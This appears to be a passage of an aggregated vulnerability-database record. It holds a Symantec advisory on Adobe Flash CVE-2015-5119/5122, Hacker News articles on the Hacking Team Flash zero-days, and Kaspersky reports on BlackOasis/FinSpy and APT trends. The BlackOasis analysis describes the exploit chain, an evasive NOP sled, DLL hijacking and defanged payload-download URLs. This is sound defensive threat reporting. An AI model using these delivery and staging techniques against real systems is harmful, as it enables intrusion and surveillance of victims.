Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.411 \n * Adobe Flash Player 11.2.202.418 \n * Adobe Flash Player 11.2.202.424 \n * Adobe Flash Player 11.2.202.425 \n * Adobe Flash Player 11.2.202.429 \n * Adobe Flash Player 11.2.202.438 \n * Adobe Flash Player 11.2.202.440 \n * Adobe Flash Player 11.2.202.442 \n * Adobe Flash Player 11.2.202.451 \n * Adobe Flash Player 11.2.202.457 \n * Adobe Flash Player 11.2.202.460 \n * Adobe Flash Player 11.2.202.466 \n * Adobe Flash Player 11.2.202.468 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 \n * Adobe Flash Player 13.0.0.250 \n * Adobe Flash Player 13.0.0.252 \n * Adobe Flash Player 13.0.0.258 \n * Adobe Flash Player 13.0.0.259 \n * Adobe Flash Player 13.0.0.260 \n * Adobe Flash Player 13.0.0.262 \n * Adobe Flash Player 13.0.0.264 \n * Adobe Flash Player 13.0.0.269 \n * Adobe Flash Player 13.0.0.277 \n * Adobe Flash Player 13.0.0.281 \n * Adobe Flash Player 13.0.0.289 \n * Adobe Flash Player 13.0.0.292 \n * Adobe Flash Player 13.0.0.296 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 15.0.0.189 \n * Adobe Flash Player 15.0.0.223 \n * Adobe Flash Player 15.0.0.239 \n * Adobe Flash Player 15.0.0.242 \n * Adobe Flash Player 15.0.0.246 \n * Adobe Flash Player 16.0.0.234 \n * Adobe Flash Player 16.0.0.235 \n * Adobe Flash Player 16.0.0.257 \n * Adobe Flash Player 16.0.0.287 \n * Adobe Flash Player 16.0.0.291 \n * Adobe Flash Player 16.0.0.296 \n * Adobe Flash Player 16.0.0.305 \n * Adobe Flash Player 17.0.0.134 \n * Adobe Flash Player 17.0.0.169 \n * Adobe Flash Player 17.0.0.188 \n * Adobe Flash Player 18.0.0.143 \n * Adobe Flash Player 18.0.0.160 \n * Adobe Flash Player 18.0.0.161 \n * Adobe Flash Player 18.0.0.194 \n * Adobe Flash Player 2 \n * Adobe Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.18D60 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary EUS 6.6.z \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * Redhat RHEL Desktop Supplementary Client 5 \n * Redhat RHEL Supplementary Server 5 \n * SuSE openSUSE Evergreen 11.4 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2015-07-07T00:00:00", "type": "symantec", "title": "Adobe Flash Player ActionScript 3 ByteArray Use After Free Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2015-5122"], "modified": "2015-07-07T00:00:00", "id": "SMNTC-75568", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/75568", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:17:19", "description": "[](<https://3.bp.blogspot.com/-qllvndzYpes/VZ5mlZ4rLxI/AAAAAAAAjeU/W_yymRKV2Ns/s1600/Hacking-Team-Flash-Zero-Day.jpg>)\n\nThe corporate data leaked in the [recent cyber attack](<https://thehackernews.com/2015/07/Italian-hacking-team-software.html>) on the infamous surveillance software firm [Hacking Team](<https://thehackernews.com/2014/02/hacking-team-sold-spyware-to-21.html>) has revealed that the **_Adobe Flash zero-day _**(CVE-2015-5119) exploit has already been added to several exploit kits.\n\n \n\n\nSecurity researchers at Trend Micro have discovered evidences of the **_Adobe Flash zero-day (CVE-2015-5119) exploit_** being used in a number of exploit kits before the vulnerability was publicly revealed in this week's data breach on the spyware company.\n\n \n\n\nThe successful exploitation of the zero-day Flash vulnerability could cause a system crash, potentially allowing an attacker to take full control of the affected system.\n\n \n\n\n### Adobe Flash Zero-Day Targeted Japan and Korea\n\n \n\n\nAccording to the researchers, the zero-day exploit, about which the rest of the world got access on Monday, was apparently used in limited cyber attacks on **South Korea **and** Japan**.\n\n> _\"In late June, [Trend Micro] learned that a user in Korea was the attempted target of various exploits, including a Flash vulnerability (CVE-2014-0497) discovered last year,\" _Weimin Wu, threat analyst at Trend Micro [wrote](<http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-flash-zero-day-tied-to-attacks-in-korea-and-japan-on-july-1/>). \n \n_\"Traffic logs indicate the user may have received spear-phishing emails with attached documents\u2026contained a URL for the user to visit. This URL led to a site hosted in the United States, which [included] a Flash exploit, detected as SWF_EXPLOYT.YYKI. This particular exploit targets the zero-day Adobe vulnerability that was disclosed during the [Hacking Team leak](<https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html>).\"_\n\nThe zero-day exploit downloads a Trojan on the target victim's computer, which further downloads several other malicious payloads on the infected system.\n\n \n\n\nResearchers say the zero-day exploit code they came across was very similar to the exploit code revealed as part of the [Hacking Team data breach](<https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html>). This simply means the attack was conducted by someone with the access to the tools and services offered by Hacking Team.\n\n \n\n\nHowever, Adobe has [released a patch](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>) to address this Adobe Flash zero-day (CVE-2015-5119) vulnerability, thereby advising users to install the update as soon as possible.\n", "cvss3": {}, "published": "2015-07-09T01:20:00", "type": "thn", "title": "Hacking Team Flash Zero-Day Linked to Cyber Attacks on South Korea and Japan", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2014-0497"], "modified": "2015-07-09T12:20:50", "id": "THN:F6B79957FA6EFD8F9C60F4A8646CCE04", "href": "https://thehackernews.com/2015/07/Hacking-Team-Flash-Zero-Day.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:18", "description": "[](<https://1.bp.blogspot.com/-PU0YupNvZZA/VaIFHQRy0zI/AAAAAAAAjgo/0gofhn0tdLM/s1600/flash-player-exploit.jpg>)\n\nAnother Flash zero-day exploit has emerged from the [hundreds of gigabytes of data recently leaked ](<https://thehackernews.com/2015/07/Italian-hacking-team-software.html>)from **Hacking Team**, an Italian surveillance software company that is long been accused of selling spying software to governments and intelligence agencies.\n\n \n\n\nThe critical zero-day vulnerability in Adobe Flash is a **Use-After-Free() programming flaw** ([CVE-2015-5122](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5122>)) which is similar to the [CVE-2015-5119 Flash vulnerability patched](<https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html>) last week and allows an attacker to hijack vulnerable computers.\n\n \n\n\nAdobe says the cyber criminals are apparently already exploiting this vulnerability for which no patch exists yet. However, it's second time in a single week when the company is working on a fix for the zero-day vulnerability in its Flash Player software.\n\n \n\n\n### Flash Zero-Day Flaw in the Wild\n\n \n\n\nThe Exploit code for this flaw is already available online, allowing an attacker to remotely execute malicious code on victims' computers and install malware, Adobe said in an [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa15-04.html>) published late Friday.\n\n> \"Successful exploitation [of CVE-2015-5122 flaw] could cause a crash and potentially allow an attacker to take control of the affected system,\" Adobe said.\n\nThe zero-day vulnerability is present in the **_latest Adobe Flash Player version 18.0.0.204 and earlier versions for Windows, Linux and OS X_**.\n\n \n\n\nAdobe credited FireEye researcher** Dhanesh Kizhakkinan **for reporting the vulnerability documented in stolen data leaked from [Hacking Team](<https://thehackernews.com/2014/02/hacking-team-sold-spyware-to-21.html>).\n\n \n\n\nTherefore, once again we advise everyone with Flash installed to remove or disable the software until the company patches the critical security bug.\n", "cvss3": {}, "published": "2015-07-11T20:34:00", "type": "thn", "title": "Second Flash Player Zero-day Exploit found in 'Hacking Team' Dump", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5123", "CVE-2015-5119", "CVE-2015-5122"], "modified": "2015-07-12T07:34:08", "id": "THN:81AF218D527E626B7FE15454B68E5FF0", "href": "https://thehackernews.com/2015/07/hacking-flash-player-exploit.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2017-10-16T15:16:55", "description": "\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Introduction\n\nKaspersky Lab has always worked closely with vendors to protect users. As soon as we find new vulnerabilities we immediately inform the vendor in a responsible manner and provide all the details required for a fix.\n\nOn October 10, 2017, Kaspersky Lab's advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers. The exploit was delivered through a Microsoft Office document and the final payload was the latest version of FinSpy malware. We have reported the bug to Adobe who assigned it [CVE-2017-11292 and released a patch](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) earlier today:\n\n[](<https://securelist.com/files/2017/10/cve_2017_11292_credits.png>)So far only one attack has been observed in our customer base, leading us to believe the number of attacks are minimal and highly targeted.\n\nAnalysis of the payload allowed us to confidently link this attack to an actor we track as \"BlackOasis\". We are also highly confident that BlackOasis was also responsible for another zero day exploit (CVE-2017-8759) discovered by [FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) in September 2017. The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye.\n\n## BlackOasis Background\n\nWe first became aware of BlackOasis' activities in May 2016, while investigating another Adobe Flash zero day. On May 10, 2016, Adobe [warned](<https://helpx.adobe.com/security/products/flash-player/apsa16-02.html>) of a vulnerability (CVE-2016-4117) affecting Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. The vulnerability was actively being exploited in the wild.\n\nKaspersky Lab was able to identify a sample exploiting this vulnerability that was uploaded to a multi scanner system on May 8, 2016. The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&amp;C server. Although the exact payload of the attack was no longer in the C&amp;C, the same server was hosting multiple FinSpy installation packages.\n\nLeveraging data from Kaspersky Security Network, we identified two other similar exploit chains used by BlackOasis in June 2015 which were zero days at the time. Those include CVE-2015-5119 and CVE-2016-0984, which were patched in July 2015 and February 2016 respectively. These exploit chains also delivered FinSpy installation packages.\n\nSince the discovery of BlackOasis' exploitation network, we've been tracking this threat actor with the purpose of better understanding their operations and targeting and have seen a couple dozen new attacks. Some lure documents used in these attacks are shown below:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-1.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-2.png>)Decoy documents used in BlackOasis attacks\n\nTo summarize, we have seen BlackOasis utilizing at least five zero days since June 2015:\n\n * CVE-2015-5119 - June 2015\n * CVE-2016-0984 - June 2015\n * CVE-2016-4117 - May 2016\n * CVE-2017-8759 - Sept 2017\n * CVE-2017-11292 - Oct 2017\n\n## Attacks Leveraging CVE-2017-11292\n\nThe attack begins with the delivery of an Office document, presumably in this instance via e-mail. Embedded within the document is an ActiveX object which contains the Flash exploit.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-3.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-4.png>)**Flash object in the .docx file, stored in uncompressed format**\n\nThe Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-5.png>)**Unpacking routine for SWF exploit**\n\nThe exploit is a memory corruption vulnerability that exists in the \"**com.adobe.tvsdk.mediacore.BufferControlParameters**\" class. If the exploit is successful, it will gain arbitrary read / write operations within memory, thus allowing it to execute a second stage shellcode.\n\nThe first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-6.png>)NOP sled composed of 0x90 and 0x91 opcodes\n\nThe main purpose of the initial shellcode is to download second stage shellcode from hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-7.png>)**Second stage shellcode**\n\nThe second stage shellcode will then perform the following actions:\n\n 1. Download the final payload (FinSpy) from hxxp://89.45.67[.]107/rss/mo.exe\n 2. Download a lure document to display to the victim from the same IP\n 3. Execute the payload and display the lure document\n\n### Payload - mo.exe\n\nAs mentioned earlier, the \"mo.exe\" payload (MD5: 4a49135d2ecc07085a8b7c5925a36c0a) is the newest version of Gamma International's FinSpy malware, typically sold to nation states and other law enforcement agencies to use in lawful surveillance operations. This newer variant has made it especially difficult for researchers to analyze the malware due to many added anti-analysis techniques, to include a custom packer and virtual machine to execute code.\n\nThe PCODE of the virtual machine is packed with the aplib packer.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-8.png>)**Part of packed VM PCODE**\n\nAfter unpacking, the PCODE it will look like the following:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-9.png>)**Unpacked PCODE**\n\nAfter unpacking the virtual machine PCODE is then decrypted:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-10.png>)**Decrypted VM PCODE**\n\nThe custom virtual machine supports a total of 34 instructions:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-11.png>)**Example of parsed PCODE**\n\nIn this example, the \"1b\" instruction is responsible for executing native code that is specified in parameter field.\n\nOnce the payload is successfully executed, it will proceed to copy files to the following locations:\n\n * C:\\ProgramData\\ManagerApp\\AdapterTroubleshooter.exe\n * C:\\ProgramData\\ManagerApp\\15b937.cab\n * C:\\ProgramData\\ManagerApp\\install.cab\n * C:\\ProgramData\\ManagerApp\\msvcr90.dll\n * C:\\ProgramData\\ManagerApp\\d3d9.dll\n\nThe \"AdapterTroubleshooter.exe\" file is a legitimate binary which is leveraged to use the famous DLL search order hijacking technique. The \"d3d9.dll\" file is malicious and is loaded into memory by the legit binary upon execution. Once loaded, the DLL will then inject FinSpy into the Winlogon process.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-12.png>)**Part of injected code in winlogon process**\n\nThe payload calls out to three C2 servers for further control and exfiltration of data. We have observed two of them used in the past with other FinSpy payloads. Most recently one of these C2 servers was used together with CVE-2017-8759 in the attacks reported by FireEye in September 2017. These IPs and other previous samples tie closely to the BlackOasis APT cluster of FinSpy activity.\n\n## Targeting and Victims\n\nBlackOasis' interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region. This includes prominent figures in the United Nations, opposition bloggers and activists, and regional news correspondents. During 2016, we observed a heavy interest in Angola, exemplified by lure documents indicating targets with suspected ties to oil, money laundering, and other illicit activities. There is also an interest in international activists and think tanks.\n\nVictims of BlackOasis have been observed in the following countries: Russia, Iraq, Afghanistan, Nigeria, Libya, Jordan, Tunisia, Saudi Arabia, Iran, Netherlands, Bahrain, United Kingdom and Angola.\n\n## Conclusions\n\nWe estimate that the attack on HackingTeam in mid-2015 left a gap on the market for surveillance tools, which is now being filled by other companies. One of these is Gamma International with their FinFisher suite of tools. Although Gamma International itself was hacked by Phineas Fisher in 2014, the breach was not as serious as it was in the case of HackingTeam. Additionally, Gamma had two years to recover from the attack and pick up the pace.\n\nWe believe the number of attacks relying on FinFisher software, supported by zero day exploits such as the ones described here will continue to grow.\n\nWhat does it mean for everyone and how to defend against such attacks, including zero-day exploits?\n\nFor CVE-2017-11292 and other similar vulnerabilities, one can use [the killbit](<https://answers.microsoft.com/en-us/windows/forum/windows_8-update/flashplayer-updates/cd258a3f-cd87-4ea9-bdb6-074d06ad491e?auth=1>) for Flash within their organizations to disable it in any applications that respect it. Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit. Additionally, this may break any other necessary resources that rely on Flash and of course, it will not protect against exploits for other third party software.\n\nDeploying a multi-layered approach including access policies, anti-virus, network monitoring and whitelisting can help ensure customers are protected against threats such as this. Users of Kaspersky products are protected as well against this threat by one of the following detections:&lt;/p style=\"margin-bottom:0!important\"&gt;\n\n * PDM:Exploit.Win32.Generic\n * HEUR:Exploit.SWF.Generic\n * HEUR:Exploit.MSOffice.Generic\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Acknowledgements\n\nWe would like to thank the Adobe Product Security Incident Response Team (PSIRT) for working with us to identify and patch this vulnerability.\n\n## References\n\n 1. Adobe Bulletin <https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>\n\n## Indicators of compromise\n\n4a49135d2ecc07085a8b7c5925a36c0a \n89.45.67[.]107", "cvss3": {}, "published": "2017-10-16T14:28:47", "title": "BlackOasis APT and new targeted attacks leveraging zero-day exploit", "type": "securelist", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-11292", "CVE-2017-8759"], "modified": "2017-10-16T14:28:47", "id": "SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "href": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-29T03:16:10", "description": "\n\n## Introduction\n\nSince 2014, Kaspersky Lab's Global Research and Analysis Team (GReAT) has been providing threat intelligence reports to a wide-range of customers worldwide, leading to the delivery of a full and dedicated private reporting service. Prior to the new service offering, GReAT published research online for the general public in an effort to help combat the ever-increasing threat from nation-state and other advanced actors. Since we began offering a threat intelligence service, all deep technical details on advanced campaigns are first pushed to our subscriber base. At the same time, to remain true to our efforts to help make the internet safer, important incidents, such as WannaCry or Petya are covered in both private and public reports.\n\n[](<https://securelist.com/files/2017/08/APT-report-Q2-2017-1.png>)\n\nKaspersky's Private Threat Intelligence Portal (TIP)\n\nIn Q1 of 2017 we published our [first APT Trends report](<https://securelist.com/apt-trends-report-q1-2017/78169/>), highlighting our top research findings over the last few months. We will continue to publish quarterly reports as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most users should be aware of. If you would like to learn more about our intelligence reports or request more information for a specific report, readers are encouraged to contact: **intelreports@kaspersky.com**.\n\n## Russian-Speaking Actors\n\nThe second quarter of 2017 has seen multiple incidents involving Russian-speaking threat actors. Topping the list of 'attention grabbers' were the Sofacy and Turla threat actors.\n\nMarch and April started off with a bang, with the discovery of three zero-day exploits being used in-the-wild by Sofacy and Turla: two of these targeted Microsoft Office's Encapsulated PostScript (EPS) and the third being a Microsoft Windows Local Privilege Escalation (LPE). Sofacy was discovered utilizing both CVE-2017-0262 (an EPS vulnerability) and CVE-2017-0263 (LPE) over the Easter holiday, targeting a swath of users throughout Europe. Prior to this attack, Turla was also discovered using CVE-2017-0261 (a different EPS vulnerability). Neither actor appeared to deviate from their usual payload repertoire, with Sofacy dropping their typical GAMEFISH payload and Turla utilizing what we refer to as ICEDCOFFEE (a.k.a. Shirime). Targeting for these attacks was also directly within the normal wheelhouse for both actors, focusing mainly on foreign ministries, governments, and other government-affiliated organizations.\n\nGReAT produced additional reports on Sofacy and Turla beyond those mentioned above. In April, we notified customers of two new experimental macro techniques utilized by Sofacy. These techniques, while not particularly sophisticated, caught our attention as they had not been seen before in-the-wild. The first technique involved using the built-in 'certutil' utility in Microsoft Windows to extract a hardcoded payload within a macro. The second technique involved embedding Base64-encoded payloads within the EXIF metadata of the malicious documents. While the targeting for this new set of activity was again fairly standard, we discovered some noteworthy targeting against a French political party member prior to the 2017 elections. Moving into May and June, we wrote two additional reports of interest involving these two actors: the first was an update on the long running \"Mosquito Turla\" campaign showing the usage of fake Adobe Flash installers and continued targeting of foreign Ministries. The other documented yet another update on Sofacy's unique Delphi payload we call 'Zebrocy'.\n\nJune saw the massive outbreak of a piece of malware [dubbed](<https://securelist.com/schroedingers-petya/78870/>) \"ExPetr\". While initial assessments presumed that this was yet another ransomware attack \u00e0 la WannaCry, a deeper assessment by GReAT places the initial intent as constituting an operation destructive in nature. We were also able to confidently identify the initial distribution of the malware, as well as indicate a _low confidence _assessment that the attacks may share traits with the BlackEnergy actors. \n\n[](<https://securelist.com/files/2017/08/APT-report-Q2-2017-2.png>)\n\nBelow is a summary of report titles produced for the Eastern European region only. As stated above, if you would like to learn more about our threat intelligence products or request more information on a specific report, please direct inquiries to **intelreports@kaspersky.com**.\n\n 1. Sofacy Dabbling in New Macro Techniques\n 2. Sofacy Using Two Zero Days in Recent Targeted Attacks - early warning\n 3. Turla EPS Zero Day - early warning\n 4. Mosquito Turla Targets Foreign Affairs Globally\n 5. Update on Zebrocy Activity June 2017\n 6. ExPetr motivation and attribution - Early alert\n 7. BlackBox ATM attacks using SDC bus injection\n\n## English-Speaking Actors\n\nEnglish-speaking actors are always particularly fascinating due to their history of complex tooling and campaigns. Actors like Regin and Project Sauron have proven fascinating examples of new techniques leveraged in long-lasting, hard to catch campaigns and as such make ideal subjects for further research. Not to be outdone, Equation and the Lamberts were the subjects of our most recent investigations.\n\nContinuing our practice of conducting malware paleontology while integrating new discoveries, we published a report on EQUATIONVECTOR, an Equation backdoor first used as early as 2006. This backdoor is a fascinating passive-active shellcode staging implant. It's one of the earliest noted instances of a NObody But US ('NOBUS') backdoor for staging further attacks. Despite its age, the EQUATIONVECTOR backdoor (identified as 'PeddleCheap' in the latest ShadowBrokers disclosures) incorporates many advanced techniques for prolonged stealthy operations in victim networks, allowing the Equation operators to deliver further payloads without arousing suspicion. The report tracks the development of these tools through subsequent iterations year-by-year.\n\nOur tracking of the Lamberts toolkit continues with the publication of the Gray Lambert report in June, the most advanced Lambert known to date. This too is a NOBUS backdoor, a passive implant operating strictly in user-land. The intricate usefulness of Gray Lambert lies in its ability to orchestrate multiple sniffer victims on a network via broadcast, multicast, and unicast commands, allowing the operators to employ surgical precision in networks with many infected machines. The sniffers double as next-stage payload delivery mechanisms for an infected network. A notable feature of the Lambert campaigns is the level of precision with which targets are chosen; Gray Lambert's victimology is primarily focused on strategic verticals in Asia and Middle East. During this investigation, GReAT researchers have also discovered two additional Lambert families (Red Lambert and Brown Lambert) currently under investigation for Q3. Below is a list of report titles for reference:\n\n 1. EQUATIONVECTOR - A Generational Breakdown of the PeddleCheap Multifunctional Backdoor\n 2. The Gray Lambert \u2013 A Leap in Sophistication to User-land NOBUS Passive Implants\n\n## Korean-speaking Actors\n\nOur researchers focusing on attacks with a Korean nexus also had a very busy quarter, producing seven reports on the Lazarus group and WannaCry attacks. Most of the reports on Lazarus directly involved a sub-group we refer to as BlueNoroff. They are the arm that focuses mainly on financial gain, targeting banks, ATMs, and other \"money-makers\". We revealed to customers a previously unknown piece of malware dubbed 'Manuscrypt' used by Lazarus to target not only diplomatic targets in South Korea, but also people using virtual currency and electronic payment sites. Most recently, 'Manuscrypt' has become the primary backdoor used by the BlueNoroff sub-group to target financial institutions.\n\nWannaCry also created quite a stir in the second quarter, with our analysts producing three reports and multiple blog posts on this emerging threat. What proved most interesting to us, was the probable linkage to Lazarus group as the source of the attacks, as well as the origins of the malware. GReAT researchers were able to trace back some of its earliest usage and show that before the 'EternalBlue' exploit was added to version 2, WannaCry v1 was used in spearphishing attacks months prior. Here is 